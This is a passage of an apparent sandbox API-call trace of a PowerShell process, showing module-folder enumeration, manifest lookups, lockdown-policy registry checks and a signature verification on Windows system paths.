	[0049.919] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.919] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 1
	[0049.919] FindNextFileW (in: hFindFile=0x1505fab8040, lpFindFileData=0x184c18cfc0 | out: lpFindFileData=0x184c18cfc0) returned 0
	[0049.919] FindClose (in: hFindFile=0x1505fab8040 | out: hFindFile=0x1505fab8040) returned 1
	[0049.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0049.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.919] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3e0 | out: lpFileInformation=0x184c18d3e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0049.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x184c18ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44
	[0049.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x184c18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45
	[0049.920] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x184c18cfd0 | out: lpFindFileData=0x184c18cfd0) returned 0x1505fab88e0
	[0049.920] FindNextFileW (in: hFindFile=0x1505fab88e0, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.920] FindNextFileW (in: hFindFile=0x1505fab88e0, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.920] FindNextFileW (in: hFindFile=0x1505fab88e0, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.920] FindNextFileW (in: hFindFile=0x1505fab88e0, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.920] FindNextFileW (in: hFindFile=0x1505fab88e0, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 1
	[0049.920] FindNextFileW (in: hFindFile=0x1505fab88e0, lpFindFileData=0x184c18d020 | out: lpFindFileData=0x184c18d020) returned 0
	[0049.920] FindClose (in: hFindFile=0x1505fab88e0 | out: hFindFile=0x1505fab88e0) returned 1
	[0049.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.920] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20
	[0049.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d300) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2c0) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d330) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d280) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0049.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2d0) returned 1
	[0049.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0049.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1e0) returned 1
	[0049.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0049.979] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbc12c0
	[0049.979] GetSystemDirectoryW (in: lpBuffer=0x1505fbc12c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0049.979] CoTaskMemFree (pv=0x1505fbc12c0) 
	[0049.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0049.980] WldpGetLockdownPolicy () returned 0x0
	[0049.980] GetSystemInfo (in: lpSystemInfo=0x184c18d410 | out: lpSystemInfo=0x184c18d410*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0049.980] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d318 | out: phkResult=0x184c18d318*=0x688) returned 0x0
	[0049.980] RegQueryValueExW (in: hKey=0x688, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d368, lpData=0x0, lpcbData=0x184c18d360*=0x0 | out: lpType=0x184c18d368*=0x0, lpData=0x0, lpcbData=0x184c18d360*=0x0) returned 0x2
	[0049.980] RegCloseKey (hKey=0x688) returned 0x0
	[0049.981] SetFilePointer (in: hFile=0x688, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18d198*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18d198*=0) returned 0x0
	[0049.982] SetFilePointer (in: hFile=0x688, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18d198*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18d198*=0) returned 0x950
	[0049.982] ReadFile (in: hFile=0x688, lpBuffer=0x1504767cb08, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x184c18d218, lpOverlapped=0x0 | out: lpBuffer=0x1504767cb08*, lpNumberOfBytesRead=0x184c18d218*=0x0, lpOverlapped=0x0) returned 1
	[0049.983] SetFilePointer (in: hFile=0x688, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18d198*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18d198*=0) returned 0x950
	[0049.983] ReadFile (in: hFile=0x688, lpBuffer=0x1504767d650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d218, lpOverlapped=0x0 | out: lpBuffer=0x1504767d650*, lpNumberOfBytesRead=0x184c18d218*=0x0, lpOverlapped=0x0) returned 1
	[0049.983] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbc0e80
	[0049.983] GetSystemDirectoryW (in: lpBuffer=0x1505fbc0e80, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0049.983] CoTaskMemFree (pv=0x1505fbc0e80) 
	[0049.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0049.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0049.983] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18d210 | out: lpFileInformation=0x184c18d210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0049.983] WldpGetLockdownPolicy () returned 0x0
	[0049.983] GetSystemInfo (in: lpSystemInfo=0x184c18d270 | out: lpSystemInfo=0x184c18d270*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0049.983] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d178 | out: phkResult=0x184c18d178*=0x698) returned 0x0
	[0049.983] RegQueryValueExW (in: hKey=0x698, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d1c8, lpData=0x0, lpcbData=0x184c18d1c0*=0x0 | out: lpType=0x184c18d1c8*=0x0, lpData=0x0, lpcbData=0x184c18d1c0*=0x0) returned 0x2
	[0049.983] RegCloseKey (hKey=0x698) returned 0x0
	[0049.983] CloseHandle (hObject=0x688) returned 1
	[0049.984] CoCreateGuid (in: pguid=0x184c18d328 | out: pguid=0x184c18d328*(Data1=0x689ed27f, Data2=0xf4a3, Data3=0x47de, Data4=([0]=0x89, [1]=0x98, [2]=0x43, [3]=0xf6, [4]=0xae, [5]=0x61, [6]=0x8f, [7]=0xcf))) returned 0x0
	[0049.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ccf0) returned 1
	[0050.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18cdd0 | out: lpFileInformation=0x184c18cdd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0050.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ccb0) returned 1
	[0050.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cbd0) returned 1
	[0050.019] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18ccb0 | out: lpFileInformation=0x184c18ccb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0050.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cb90) returned 1
	[0050.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18cb60) returned 1
	[0050.019] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x680
	[0050.019] GetFileType (hFile=0x680) returned 0x1
	[0050.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cad0) returned 1
	[0050.019] GetFileType (hFile=0x680) returned 0x1
	[0050.019] WTGetSignatureInfo () returned 0x0
	[0050.076] CertDuplicateCertificateContext (pCertContext=0x1505fba6b20) returned 0x1505fba6b20
	[0050.076] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18cbf8 | out: phkResult=0x184c18cbf8*=0x6c8) returned 0x0
	[0050.076] RegQueryValueExW (in: hKey=0x6c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18cc48, lpData=0x0, lpcbData=0x184c18cc40*=0x0 | out: lpType=0x184c18cc48*=0x1, lpData=0x0, lpcbData=0x184c18cc40*=0x56) returned 0x0
	[0050.076] RegQueryValueExW (in: hKey=0x6c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18cc48, lpData=0x150476a96c8, lpcbData=0x184c18cc40*=0x56 | out: lpType=0x184c18cc48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18cc40*=0x56) returned 0x0
	[0050.076] RegCloseKey (hKey=0x6c8) returned 0x0
	[0050.076] CoTaskMemAlloc (cb=0x10) returned 0x1505f3bdbf0
	[0050.077] CoTaskMemAlloc (cb=0x50) returned 0x1505fab83a0
	[0050.077] WinVerifyTrust () returned 0x0
	[0050.077] CoTaskMemFree (pv=0x1505fab83a0) 
	[0050.077] CoTaskMemFree (pv=0x1505f3bdbf0) 
	[0050.077] CertFreeCertificateContext (pCertContext=0x1505fba6b20) returned 1
	[0050.077] CloseHandle (hObject=0x680) returned 1
	[0050.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.080] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff
	[0050.080] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff
	[0050.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18bed0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
